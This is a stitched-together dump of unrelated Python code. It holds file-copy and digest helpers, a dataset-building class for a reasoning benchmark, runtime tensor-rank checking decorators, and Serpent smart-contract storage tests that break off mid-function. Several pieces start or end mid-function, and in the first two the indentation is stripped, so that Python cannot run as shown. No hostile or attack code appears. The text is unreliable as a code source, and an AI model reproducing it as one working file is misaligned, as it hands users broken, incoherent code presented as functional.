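    select = FileSelect(root="", rules=[include("*.txt"), exclude("tmp/*")])
    # Walks src_dir, copies every selected file into dest_dir preserving relative
    # paths; files that are not selected are reported to the handler's ignore().
    copytree(dest_dir, select, root_start=src_dir)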
def _copytree_src(root_start, select):
root_start = root_start or os.curdir
if select.root:
return os.path.join(root_start, select.root)
return root_start
def _relpath(path, start):
if path == start:
return ""
return os.path.relpath(path, start)
def files_digest(root):
files = _files_for_digest(root)
if not files:
return None
md5 = hashlib.md5()
for path in files:
normpath = _normalize_path_for_digest(path, root)
md5.update(_encode_file_path_for_digest(normpath))
md5.update(b"\x00")
_apply_digest_file_bytes(path, md5)
md5.update(b"\x00")
return md5.hexdigest()
def _files_for_digest(root):
all = []
for path, _dirs, files in os.walk(root, followlinks=False):
for name in files:
all.append(os.path.join(path, name))
all.sort()
return all
def _normalize_path_for_digest(path, root):
relpath = os.path.relpath(path, root)
return relpath.replace(os.path.sep, "/")
def _encode_file_path_for_digest(path):
return path.encode("UTF-8")
def _apply_digest_file_bytes(path, d):
BUF_SIZE = 1024 * 1024
with open(path, "rb") as f:
while True:
buf = f.read(BUF_SIZE)
if not buf:
break
d.update(buf)
def disk_usage(path):
total = _file_size(path)
for root, dirs, names in os.walk(path, followlinks=False):
for name in dirs + names:
path = os.path.join(root, name)
total += _file_size(os.path.join(root, name))
return total
def _file_size(path):
stat = os.lstat if os.path.islink(path) else os.stat
try:
return stat(path).st_size
except (OSError, IOError) as e:
log.warning("could not read size of %s: %s", path, e)
return 0
def find(root, followlinks=False, includedirs=False, unsorted=False):
all = []
relpath = lambda path, name: (os.path.relpath(os.path.join(path, name), root))
for path, dirs, files in os.walk(root, followlinks=followlinks):
for name in dirs:
if includedirs or os.path.islink(os.path.join(path, name)):
all.append(relpath(path, name))
for name in files:
all.append(relpath(path, name))
return all if unsorted else sorted(all)
def expand_path(path):
return os.path.expanduser(os.path.expandvars(path))
def files_differ(path1, path2):
if os.stat(path1).st_size != os.stat(path2).st_size:
return True
f1 = open(path1, "rb")
f2 = open(path2, "rb")
with f1, f2:
while True:
buf1 = f1.read(1024)
buf2 = f2.read(1024)
if buf1 != buf2:
    return True
if not buf1:
    return False
import random
import _jsonnet, json
import logging
import hashlib
import os
from copy import deepcopy
import pandas as pd
from tqdm import tqdm
import math
from LeapOfThought.resources.teachai_kb import TeachAIKB
from LeapOfThought.common.general import num2words1, bc
from LeapOfThought.common.data_utils import uniform_sample_by_column, pandas_multi_column_agg
# This is mainly for testing and debugging ...
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 2000)
pd.set_option('display.max_colwidth', 200)
pd.set_option("display.colheader_justify","left")
import numpy as np
from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class ArtiSet():
def __init__(self, args):
random.seed(17)
np.random.seed(1234)
self._np_seed = np.random.RandomState(17)
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), args.config_path) ,'r') as f:
self._config = json.load(f)[self.artiset_name]
if args.__contains__('variant') and len(args.variant) > 0:
self._output_file = args.output_file.replace('.jsonl','_' + args.variant + '.jsonl')
if len(args.experiment_version) > 0:
self._output_file = self._output_file.replace('.jsonl', '_' + args.experiment_version + '.jsonl')
else:
self._output_file = args.output_file
self._split = args.split_by_field
self._incorrect_beliefs = None
if "incorrect_beliefs_file" in args and args.incorrect_beliefs_file:
with open(args.incorrect_beliefs_file, 'r') as file:
self._incorrect_beliefs = [json.loads(line.strip()) for line in file]
self._save_sample = args.save_sample
self.artiset_data = []
def append_teachyourai_format_example(self, example, do_print=False, append_to_list=None):
"""append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
(that must contain a "phrase", "answer") and converts it to a BooleanQA format
Args:
example (dict): an example containing question,answer,dist1,dist2 fields
do_print (bool): just for debuging
num_choices (int): number of choices in question (between 2 and 5)
append_to_list (list): a
Returns:
"""
if 'context' not in example:
example['context'] = ''
if 'id' not in example:
example['id'] = self.create_qid(example)
if do_print:
print('Q: %s || A: %s' % (example['phrase'], example['answer']))
if append_to_list is not None:
append_to_list.append(example)
else:
self.artiset_data.append(example)
@staticmethod
def create_qid(example):
m = hashlib.md5()
m.update(example['phrase'].encode())
m.update(example['context'].encode())
# boolean examples have binary answer (int 0 or 1)
m.update(str(example['answer']).encode())
return m.hexdigest()
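# Hedged usage sketch (not part of the original class): the minimal dict that
# append_teachyourai_format_example() expects. The field values are invented.
#
#   example = {"phrase": "whales are mammals.", "answer": 1}
#   artiset.append_teachyourai_format_example(example)
#   # 'context' defaults to '' and 'id' is derived via create_qid()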
def split_by_columns(self):
split_columns = self._split.split(',')
examples = self.examples_meta
indexes = {}
# check the split columns are in the data
if len(set(split_columns) - set(examples.columns)) != 0:
raise (ValueError("split columns used to split dev/test and train set do not exist the examples_meta!"))
all_objs = []
for split_column in split_columns:
all_objs += list(examples[split_column])
#best_train_inds, best_dev_inds, best_test_inds = [], [], []
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
if len(split_columns) > 1:
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
dev_test_examples = examples.iloc[test_inds + dev_inds]
dev_test_objs = []
for split_column in split_columns:
dev_test_objs += list(dev_test_examples[split_column])
dev_test_objs = pd.Series(list(set(dev_test_objs)))
else:
# We'll choose the test-dev examples from values of split that have the lowest number of examples.
# this will ensure we are choosing the highest number of training examples that are still disjoint on split_columns[0] from dev+test
split_columns_value_counts = examples[split_columns[0]].value_counts().sort_values().cumsum().reset_index()
start_ind = split_columns_value_counts[split_columns_value_counts[split_columns[0]] > \
sum(self._config['test_dev_size'])].index[0] + 1
dev_test_objs = list(split_columns_value_counts['index'][0:start_ind])
dev_test_examples = examples[examples[split_columns[0]].isin(dev_test_objs)]
inds = list(dev_test_examples.index)
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
for split_column in split_columns:
indexes[split_column] = examples.set_index(split_column)
dev_ids = set()
not_in_train_ids = set()
for split_column in split_columns:
dev_ids = dev_ids & set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
not_in_train_ids = not_in_train_ids | set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
train_examples = examples.loc[~examples['qid'].isin(not_in_train_ids), :]
train_inds = list(train_examples.index)
if len(train_inds) > self._config['max_number_of_examples']:
train_inds = train_inds[0:self._config['max_number_of_examples']]
random.shuffle(train_inds)
print("total dev-test examples available: %d" % (len(dev_test_examples)))
print("split produced %d training examples" % (len(train_inds)))
return train_inds, dev_inds, test_inds
def save_dataset(self):
"""save_dataset() automatically saves the artiset
if the config output_file contains the string _sample.jsonl it will be saved in a more readable format
otherwise it will split the examples in self.artiset_data into train, dev, test and save them in s3
if output_file startswith s3:// otherwise locally. (If output_file is empty, it will not save)
Args:
arg1 (int): Description of arg1
arg2 (str): Description of arg2
Returns:
bool: Description of return value
"""
# Move non-required columns to metadata:
artiset_data_with_metadata = []
for example in self.artiset_data:
if 'metadata' not in example:
new_example = {'metadata':{}}
else:
new_example = {'metadata': example['metadata']}
new_example.update({k:example[k] for k in ['id', 'phrase', 'context', 'answer']})
new_example['metadata'].update({k: example[k] for k in set(example.keys()) - {'id', 'phrase', 'context', 'answer','metadata'}})
artiset_data_with_metadata.append(new_example)
self.artiset_data = artiset_data_with_metadata
# splitting
if len(self._split) > 0:
train_inds, dev_inds, test_inds = self.split_by_columns()
elif 'split' in self.examples_meta:
test_inds = list(self.examples_meta[self.examples_meta['split'] == 'test'].index)
dev_inds = list(self.examples_meta[self.examples_meta['split'] == 'dev'].index)
train_inds = list(self.examples_meta[self.examples_meta['split'] == 'train'].index)
random.seed(17)
random.shuffle(train_inds)
#random.shuffle(test_inds)
#random.shuffle(dev_inds)
test_inds = test_inds[0: self._config['test_dev_size'][0]]
dev_inds = dev_inds[0:self._config['test_dev_size'][1]]
train_inds = train_inds[0:self._config['max_number_of_examples']]
else:
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
test_inds = inds[0:self._config['test_dev_size'][0]]
dev_inds = inds[self._config['test_dev_size'][0]:sum(self._config['test_dev_size'])]
train_inds = inds[sum(self._config['test_dev_size']):]
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
if self._save_sample:
if 'split' in self.examples_meta.columns:
logger.info(f"size of each split:\n{self.examples_meta['split'].value_counts()}")
random.seed(17)
if len(self.artiset_data) > 100:
self.artiset_data = random.sample(self.artiset_data,100)
save_func(self._output_file, self.artiset_data, sample_indent=self._save_sample)
else:
logger.info('uploading %d,%d,%d test,dev,train examples' % (len(test_inds),len(dev_inds),len(train_inds)))
save_func(self._output_file.replace('.jsonl', '_test.jsonl'), [self.artiset_data[i] for i in test_inds])
save_func(self._output_file.replace('.jsonl', '_dev.jsonl'), [self.artiset_data[i] for i in dev_inds])
save_func(self._output_file.replace('.jsonl', '_train.jsonl'), [self.artiset_data[i] for i in train_inds])
if len(self.examples_meta) > 0:
save_func(self._output_file.replace('.jsonl', '_meta.jsonl'), self.examples_meta.to_dict(orient='records'))
return train_inds, dev_inds, test_inds
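# Hedged usage sketch (not part of the original class): the typical driver flow
# assumed by this module; the subclass and variable names below are illustrative only.
#
#   artiset = SomeArtiSetSubclass(args)      # hypothetical ArtiSet subclass
#   artiset.build_artificial_dataset(args)   # fills self.artiset_data / self.examples_meta
#   artiset.save_dataset()                   # splits and writes *_train/_dev/_test.jsonl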
def save_single_split(self, split_data, split):
inds = [i for i in range(len(split_data))]
random.seed(17)
random.shuffle(inds)
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = self._output_file.find('_sample') > -1
save_func(self._output_file.replace('.jsonl', '_' + split + '.jsonl'), [split_data[i] for i in inds], sample_indent=si)
def save_aux_data(self, output_file, data):
if output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(output_file) and len(output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = output_file.find('_sample') > -1
save_func(output_file, data, sample_indent=si)
def build_artificial_dataset(self,args):
pass
def resplit(self, args):
logger.error('Not implemented for this artiset')
def build_statement_rule_property_examples(self, examples, split, statement_tag='statement', ablate_same_distractor_fields = 1.0,\
rule_tags=['implicit_rule','property'], distractor_tags = ['distractors'], ablation_list=[], use_shorthand=False, \
nlg_sampling=False, reverse_validity_frac=0):
# computing ID before ablations on the statement and rule tags:
for i, example in enumerate(examples):
m = hashlib.md5()
# note that the tags for ID creation are always the same!
for tag in [statement_tag] + rule_tags:
if tag in example:
if type(example[tag]) == list:
for e in example[tag]:
m.update(e['subject'].encode())
m.update(e['predicate'].encode())
m.update(e['object'].encode())
m.update(e['validity'].encode())
else:
m.update(example[tag]['subject'].encode())
m.update(example[tag]['predicate'].encode())
m.update(example[tag]['object'].encode())
m.update(example[tag]['validity'].encode())
example['id'] = m.hexdigest()
# Ablations
# now that all the examples are ready, we can ablate as needed:
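        # Expected ablation_list entry formats, inferred from the loop below
        # (field and value names here are hypothetical):
        #
        #   ablation_list = [
        #       (['implicit_rule'], 0.5),                             # ablate the field from 50% of examples
        #       (['property'], 0.3, ('some_field', ['some_value'])),  # only from examples whose some_field matches
        #   ]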
random.seed(17)
for ablation in ablation_list:
if len(ablation) == 3:
fields, fraction, condition = ablation
examples_cands = [e for e in examples if e[condition[0]] in condition[1]]
else:
fields, fraction = ablation
examples_cands = examples
example_to_ablate = random.sample(examples_cands, int(fraction * float(len(examples))))
for e in example_to_ablate:
for field in fields:
if field in e:
del e[field]
# for every field we ablate we must ablate the same field from distractors!
if random.random() < ablate_same_distractor_fields:
for distractor_tag in distractor_tags:
if distractor_tag in e:
if field in e[distractor_tag]:
del e[distractor_tag][field]
random.seed(17)
for i, example in enumerate(examples):
context_rules = []
# adding actual rules
for rule_tag in rule_tags:
if rule_tag in example:
rules = example[rule_tag]
if not type(rules) == list:
rules = [rules]
for rule in rules:
reverse_validity = not rule['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(rule,
is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand, nlg_sampling=nlg_sampling))
# adding distractors
for rule_tag in distractor_tags:
if rule_tag in example:
for field, tag_distractors in example[rule_tag].items():
for rule in tag_distractors:
rule_list = rule
if not type(rule_list) == list:
rule_list = [rule_list]
for r in rule_list:
reverse_validity = not r['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(r, is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand,
nlg_sampling=nlg_sampling))
use_hypothetical_statement = False
if 'is_hypothetical_statement' in example and example['is_hypothetical_statement']:
use_hypothetical_statement = True
answer = 1 if example[statement_tag]['validity'] == 'always true' else 0
if self.variant != 'statement_subject_lang_selectivity':
if random.random() < reverse_validity_frac:
answer = 1 - answer
reverse_validity = True
else:
reverse_validity = False
phrase = TeachAIKB().to_pseudo_language(example[statement_tag], is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling, reverse_validity=reverse_validity)
else:
statement_dict = deepcopy(example[statement_tag])
statement_dict['subject'] = random.sample(['foo','blah','ya','qux','aranglopa','foltopia','cakophon','baz','garply'], 1)[0]
phrase = TeachAIKB().to_pseudo_language(statement_dict, is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling)
# creating a unique set of rules that does not include the statement.
context_rules = list(set(context_rules))
            # set order is random, so we sort first to get a replicable order before shuffling.
context_rules = sorted(context_rules)
random.shuffle(context_rules)
example.update({'phrase': phrase, \
'answer': answer,
'context': ' '.join(context_rules),
'split': split,
'rules': context_rules})
            # append_teachyourai_format_example() is a method implemented in the ArtiSet class; it takes an example dict
            # (which must contain "phrase" and "answer") and converts it to the BooleanQA format.
self.append_teachyourai_format_example(example, do_print=False)
self.examples_meta.append(deepcopy(example))
def print_examples(self, sample):
random.seed(7)
example_inds = random.sample(range(len(self.artiset_data)), sample)
## Printing a sample!
for ind in example_inds:
example = self.artiset_data[ind]
if 'statement' in | |
<gh_stars>100-1000
"""Decorators for confirming shapes are correct at runtime."""
import copy
import functools
import inspect
import textwrap
import typing
from typing import Any, Dict, Mapping, Tuple, Union
import tensor_annotations.jax as tjax
import tensor_annotations.tensorflow as ttf
import tree
# TODO: Replace this with something easier to maintain.
_TYPES_TO_CHECK = [
ttf.Tensor0,
ttf.Tensor1,
ttf.Tensor2,
ttf.Tensor3,
ttf.Tensor4,
ttf.Tensor5,
ttf.Tensor6,
ttf.Tensor7,
tjax.Array0,
tjax.Array1,
tjax.Array2,
tjax.Array3,
tjax.Array4,
]
def _is_tensor_type(t):
if not hasattr(t, '__origin__'):
# It's not a generic type, so can't be one of the types we care about.
return False
# If t is Tensor1[Height], then t.__origin__ == Tensor1.
if not any(t.__origin__ is generic_type
for generic_type in _TYPES_TO_CHECK):
return False
return True
def verify_runtime_ranks_of_return_and_args(func=None, *, check_trees=False):
"""Decorator that verifies ranks of arguments and return are correct.
For example, if an argument `x` is annotated as having type
`Tensor2[Height, Width]`, we verify that `len(x.shape) == 2`.
Note that nested argument and return types are not verified.
For example, if the return type is `Tuple[int, Tensor2[Height, Width]]`,
we give up and do no checks.
Args:
func: The function to decorate.
check_trees: Whether to recursively check tree-like types. If `True`, we'll
recurse through tree elements, and check any node that has a `.shape`
attribute. We support trees composed of dictionaries, tuples, and
named tuples.
Raises:
TypeError: If rank of return type or any argument is incorrect.
Returns:
Decorated function.
"""
if func is not None:
# Decorator used with no arguments.
return functools.partial(_verify_runtime_ranks_of_return_and_args,
func, check_trees)
else:
# Decorator used with `check_trees` set explicitly.
def decorator(func):
return functools.partial(_verify_runtime_ranks_of_return_and_args,
func, check_trees)
return decorator
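# Illustrative usage sketch (not part of this module). `Height` and `Width`
# stand for tensor_annotations axis labels assumed to be declared elsewhere;
# treat the exact names as hypothetical.
#
#   import tensorflow as tf
#
#   @verify_runtime_ranks_of_return_and_args
#   def transpose(x: ttf.Tensor2[Height, Width]) -> ttf.Tensor2[Width, Height]:
#     return tf.transpose(x)
#
#   transpose(tf.zeros([3, 4]))     # OK: actual rank 2 matches the annotated rank.
#   transpose(tf.zeros([3, 4, 5]))  # Raises TypeError: rank 3 != annotated rank 2.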
def _verify_runtime_ranks_of_return_and_args( # pylint: disable=invalid-name
func, _check_trees, *args, **kwargs
):
"""Main implementation of verify_runtime_ranks_of_return_and_args.
Args:
func: The function to decorate.
_check_trees: Whether to check tree-like types. (Underscored to prevent
name collisions with other arguments in `args` and `kwargs`.)
*args: Positional arguments to `func`.
**kwargs: Keyword arguments to `func`.
Returns:
The return value of `func`.
"""
sig: inspect.Signature = inspect.signature(func)
# ===== Verify args. =====
bound_arguments: inspect.BoundArguments = sig.bind(*args, **kwargs)
# Do some args have default values, but the arg was not specified?
# If so, set the args to their default values.
bound_arguments.apply_defaults()
arg_value_by_name: Dict[str, Any] = bound_arguments.arguments
arg_signature_by_name: Mapping[str, inspect.Parameter] = sig.parameters
# Note: we iterate over signatures, not argument values, because some
# arguments may not have signatures.
for arg_name in arg_signature_by_name:
arg_signature = arg_signature_by_name[arg_name]
arg_value = arg_value_by_name[arg_name]
arg_type = arg_signature.annotation
if _is_tensor_type(arg_type):
_check_non_tree(func.__name__, arg_name, arg_value, arg_type)
elif _is_tree_type(arg_type):
type_tree = _tree_type_to_type_tree(arg_type)
_check_tree(func.__name__, arg_name, arg_value, type_tree)
# ===== Call function. =====
func_return_value = func(*args, **kwargs)
# ===== Verify return. =====
return_type = sig.return_annotation
if not _is_tensor_type(return_type):
return func_return_value
if not hasattr(func_return_value, 'shape'):
message = textwrap.dedent(f"""\
Function '{func.__name__}': return has type annotation '{return_type}'
but actual return type is '{type(func_return_value).__name__}'
""")
message_one_line = message.replace('\n', ' ')
raise TypeError(message_one_line)
annotated_rank = len(return_type.__args__)
actual_rank = len(func_return_value.shape)
if annotated_rank != actual_rank:
message = textwrap.dedent(f"""\
Function '{func.__name__}': return has type annotation '{return_type}'
with rank {annotated_rank}, but actual shape is
'{func_return_value.shape}' with rank {actual_rank}
""")
message_one_line = message.replace('\n', ' ')
raise TypeError(message_one_line)
return func_return_value
def _is_typed_tuple(x):
return (
hasattr(x, '__origin__')
# `Tuple` for e.g. Python 3.6, `tuple` for e.g. Python 3.9.
and x.__origin__ in (Tuple, tuple)
)
def _is_typed_dict(x):
return (
hasattr(x, '__origin__')
# `Dict` for e.g. Python 3.6, `dict` for e.g. Python 3.9.
and x.__origin__ in (Dict, dict)
)
def _is_typed_namedtuple(x):
return hasattr(x, '_fields') and (
hasattr(x, '_field_types') # Python 3.6
or hasattr(x, '__annotations__') # Python 3.9
)
def _is_tree_type(x):
return _is_typed_tuple(x) or _is_typed_dict(x) or _is_typed_namedtuple(x)
def _check_non_tree(
func_name: str,
arg_name: str,
arg_value: Any,
arg_type: Any,
):
"""Checks a non-tree argument.
Args:
func_name: The name of the function whose argument we're checking.
arg_name: The name of the argument we're checking.
arg_value: The value of the argument.
arg_type: The annotated type of the argument.
Raises:
TypeError: If the type or rank of `value_tree_subtree` is not what it's
supposed to be, according to the type from `type_tree`.
"""
if not hasattr(arg_value, 'shape'):
message = textwrap.dedent(f"""\
Function '{func_name}': argument '{arg_name}' has type
annotation '{arg_type}', but actual type is
'{type(arg_value).__name__}'.
""")
message_one_line = message.replace('\n', ' ')
raise TypeError(message_one_line)
# If arg_type is Tensor2[Height, Width],
# then arg_type.__args__ == (Height, Width).
annotated_arg_rank = len(arg_type.__args__)
actual_arg_rank = len(arg_value.shape)
if annotated_arg_rank != actual_arg_rank:
message = textwrap.dedent(f"""\
Function '{func_name}': argument '{arg_name}' has type
annotation '{arg_type}' with rank {annotated_arg_rank},
but actual shape is '{arg_value.shape}' with rank {actual_arg_rank}
""")
message_one_line = message.replace('\n', ' ')
raise TypeError(message_one_line)
def _tree_type_to_type_tree(tree_type: Any) -> Any:
"""Converts a tree-like type to a tree of the component types.
Examples:
T = Tuple[int, str]
tree_type_to_type_tree(T) == (int, str)
T2 = Dict[str, Tuple[float]]
tree_type_to_type_tree(T2) == {str: (float,)}
T3 = List[bool]
tree_type_to_type_tree(T3) == [bool]
class T3(NamedTuple):
obses: Tuple[np.ndarray]
actions: Tuple[np.ndarray]
tree_type_to_type_tree(T3) == T3(obses=(np.ndarray,), actions=(np.ndarray,))
If any of the items in the tree is unparameterised, it is not converted:
T = Tuple[List, str]
tree_type_to_type_tree(T) == (List, str)
Args:
tree_type: The tree-like type to convert.
Returns:
A tree of the component types.
Raises:
ValueError: If `tree_type` isn't a tree-like type.
"""
def convert_tuple(x):
if not _is_typed_tuple(x):
return x
# Check for unparameterised Tuple.
if (
not hasattr(x, '__args__') or # Python 3.9
x.__args__ is None or # Python 3.6
not x.__args__ # Python 3.7
):
return x
# If x is Tuple[int, str, float], x.__args__ will be (int, str, float).
args = x.__args__
# Check for Tuple[()].
if args == ((),):
return ()
return args
def convert_dict(x):
if not _is_typed_dict(x):
return x
# Check for unparameterised Dict.
if (
not hasattr(x, '__args__') or # Python 3.9
x.__args__ is None or # Python 3.6
# Python 3.7
x.__args__ == (typing.KT, typing.VT) # pytype: disable=module-attr
):
return x
# If x is Dict[str, int], then x.__args__ should be (str, int).
key_type, value_type = x.__args__
return {key_type: value_type}
def convert_named_tuple(x):
if not _is_typed_namedtuple(x):
return x
try:
# Python 3.6/3.7
args = dict(x._field_types) # pylint: disable=protected-access
except AttributeError:
# Python 3.9
args = x.__annotations__
return x(**args)
tree_of_types = tree_type
# Right now, `type_tree` doesn't even look like a tree.
# So first, we have to try and convert the top-level type to a tree,
# e.g. Tuple[Tuple[int]] -> (Tuple[int],)
for f in (convert_tuple, convert_dict, convert_named_tuple):
tree_of_types = f(tree_of_types)
if tree_of_types == tree_type:
raise ValueError('tree_type does not appear to be a tree-like type')
# Now we just have to keep converting elements of the tree until all
# elements have been converted.
prev_type_tree = copy.deepcopy(tree_of_types)
while True:
for f in (convert_tuple, convert_dict, convert_named_tuple):
tree_of_types = tree.map_structure(f, tree_of_types)
if tree_of_types == prev_type_tree:
break
prev_type_tree = tree_of_types
return tree_of_types
def _check_tree(
func_name: str,
arg_name: str,
value_tree,
type_tree,
):
"""Checks ranks in a tree-like argument.
Arguments:
func_name: The name of the function whose argument we're checking.
arg_name: The name of the argument we're checking.
value_tree: The value of the argument.
type_tree: The types of `value_tree`.
"""
tree.traverse_with_path(
functools.partial(_check_tree_traverse, func_name, arg_name, type_tree),
value_tree,
)
def _check_tree_traverse(
func_name: str,
arg_name: str,
type_tree,
path: Tuple[Union[int, str]],
value_tree_subtree,
):
"""Visits a node of `value_tree`, checking the type from `type_tree`.
Called from `_check_tree`.
Args:
func_name: The name of the function whose argument we're checking.
arg_name: The name of the argument we're checking.
type_tree: The types of `value_tree`.
path: A sequence of the branch keys we had to take to get to where we are.
For example, if `value_tree` is {'a': (10, 11)}, and if we're at the
10, then `path` would be ('a', 0).
value_tree_subtree: The subtree of `value_tree` rooted at the current
position.
Raises:
ValueError: If something goes wrong while trying to find the expected type
of the current node in `type_tree`.
TypeError: If the type or rank of `value_tree_subtree` is not what it's
supposed to be, according to the type from `type_tree`.
"""
# ===== Step 1: Find the type of this node in `type_tree`. =====
type_tree_node = type_tree
path_str = ''
for path_element in path:
if isinstance(type_tree_node, Dict):
if len(type_tree_node) != 1:
raise ValueError('Expected type tree type_tree_node to be of form '
'{key_type: value_type}, but is actually '
+ str(type_tree_node))
# If `value_tree` is `{'a': 0}`, then `type_tree` | |
self.chessboard[3][0] = 3
self.users[0].health = 100
self.users[1].x = 15
self.users[1].y = 12
self.users[1].items[2] = 9
self.users[80].health = self
self.users[80].items[3] = self
self.person.head = 555
self.person.arms[0].elbow = 556
self.person.arms[0].fingers[0] = 557
self.person.arms[0].fingers[4] = 558
self.person.legs[0] = 559
self.person.arms[1].elbow = 656
self.person.arms[1].fingers[0] = 657
self.person.arms[1].fingers[4] = 658
self.person.legs[1] = 659
self.person.legs[1] += 1000
def query_chessboard(x, y):
return(self.chessboard[x][y])
def query_stats(u):
return([self.users[u].health, self.users[u].x, self.users[u].y]:a)
def query_items(u, i):
return(self.users[u].items[i])
def query_person():
a = array(15)
a[0] = self.person.head
a[1] = self.person.arms[0].elbow
a[2] = self.person.arms[1].elbow
a[3] = self.person.legs[0]
a[4] = self.person.legs[1]
i = 0
while i < 5:
a[5 + i] = self.person.arms[0].fingers[i]
a[10 + i] = self.person.arms[1].fingers[i]
i += 1
return(a:a)
def testping(x, y):
return([self.users[80].health.testping2(x), self.users[80].items[3].testping2(y)]:a)
def testping2(x):
return(x*x)
"""
def test_storage_objects():
s = tester.state()
c = s.contract(storage_object_test_code)
s.send(tester.k0, c, 0, funid=0, abi=[])
assert [1] == s.send(tester.k0, c, 0, funid=1, abi=[0, 0])
assert [2] == s.send(tester.k0, c, 0, funid=1, abi=[0, 1])
assert [3] == s.send(tester.k0, c, 0, funid=1, abi=[3, 0])
assert [100, 0, 0] == s.send(tester.k0, c, 0, funid=2, abi=[0])
assert [0, 15, 12] == s.send(tester.k0, c, 0, funid=2, abi=[1])
assert [0] == s.send(tester.k0, c, 0, funid=3, abi=[1, 3])
assert [0] == s.send(tester.k0, c, 0, funid=3, abi=[0, 2])
assert [9] == s.send(tester.k0, c, 0, funid=3, abi=[1, 2])
assert [555, 556, 656, 559, 1659,
557, 0, 0, 0, 558,
657, 0, 0, 0, 658] == s.send(tester.k0, c, 0, funid=4, abi=[])
assert [361, 441] == s.send(tester.k0, c, 0, funid=5, abi=[19, 21])
infinite_storage_object_test_code = """
data chessboard[][8]
data users[100](health, x, y, items[])
data person(head, arms[](elbow, fingers[5]), legs[2])
def ping():
self.chessboard[0][0] = 1
self.chessboard[0][1] = 2
self.chessboard[3][0] = 3
self.users[0].health = 100
self.users[1].x = 15
self.users[1].y = 12
self.users[1].items[2] = 9
self.person.head = 555
self.person.arms[0].elbow = 556
self.person.arms[0].fingers[0] = 557
self.person.arms[0].fingers[4] = 558
self.person.legs[0] = 559
self.person.arms[1].elbow = 656
self.person.arms[1].fingers[0] = 657
self.person.arms[1].fingers[4] = 658
self.person.legs[1] = 659
def query_chessboard(x, y):
return(self.chessboard[x][y])
def query_stats(u):
return([self.users[u].health, self.users[u].x, self.users[u].y]:a)
def query_items(u, i):
return(self.users[u].items[i])
def query_person():
a = array(15)
a[0] = self.person.head
a[1] = self.person.arms[0].elbow
a[2] = self.person.arms[1].elbow
a[3] = self.person.legs[0]
a[4] = self.person.legs[1]
i = 0
while i < 5:
a[5 + i] = self.person.arms[0].fingers[i]
a[10 + i] = self.person.arms[1].fingers[i]
i += 1
return(a:a)
"""
def test_infinite_storage_objects():
s = tester.state()
c = s.contract(infinite_storage_object_test_code)
s.send(tester.k0, c, 0, funid=0, abi=[])
assert [1] == s.send(tester.k0, c, 0, funid=1, abi=[0, 0])
assert [2] == s.send(tester.k0, c, 0, funid=1, abi=[0, 1])
assert [3] == s.send(tester.k0, c, 0, funid=1, abi=[3, 0])
assert [100, 0, 0] == s.send(tester.k0, c, 0, funid=2, abi=[0])
assert [0, 15, 12] == s.send(tester.k0, c, 0, funid=2, abi=[1])
assert [0] == s.send(tester.k0, c, 0, funid=3, abi=[1, 3])
assert [0] == s.send(tester.k0, c, 0, funid=3, abi=[0, 2])
assert [9] == s.send(tester.k0, c, 0, funid=3, abi=[1, 2])
assert [555, 556, 656, 559, 659,
557, 0, 0, 0, 558,
657, 0, 0, 0, 658] == s.send(tester.k0, c, 0, funid=4, abi=[])
fail1 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms[0]
"""
fail2 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms[0].fingers
"""
fail3 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms[0].fingers[4][3]
"""
fail4 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms.elbow[0].fingers[4]
"""
fail5 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms[0].fingers[4].nail
"""
fail6 = """
data person(head, arms[2](elbow, fingers[5]), legs[2])
x = self.person.arms[0].elbow.skin
"""
def test_storagevar_fails():
s = tester.state()
success1, success2, success3, success4, success5, success6 = \
0, 0, 0, 0, 0, 0
try:
s.contract(fail1)
    except Exception as e:
success1 = "Storage variable access not deep enough" in str(e)
assert success1, e
try:
s.contract(fail2)
    except Exception as e:
success2 = "Too few array index lookups" in str(e)
assert success2, e
try:
s.contract(fail3)
    except Exception as e:
success3 = "Too many array index lookups" in str(e)
assert success3, e
try:
s.contract(fail4)
    except Exception as e:
success4 = "Too few array index lookups" in str(e)
assert success4, e
try:
s.contract(fail5)
    except Exception as e:
success5 = "Invalid object member" in str(e)
assert success5, e
try:
s.contract(fail6)
    except Exception as e:
success6 = "Invalid object member" in str(e)
assert success6, e
crowdfund_code = """
data campaigns[2^80](recipient, goal, deadline, contrib_total, contrib_count, contribs[2^50](sender, value))
def create_campaign(id, recipient, goal, timelimit):
if self.campaigns[id].recipient:
return(0)
self.campaigns[id].recipient = recipient
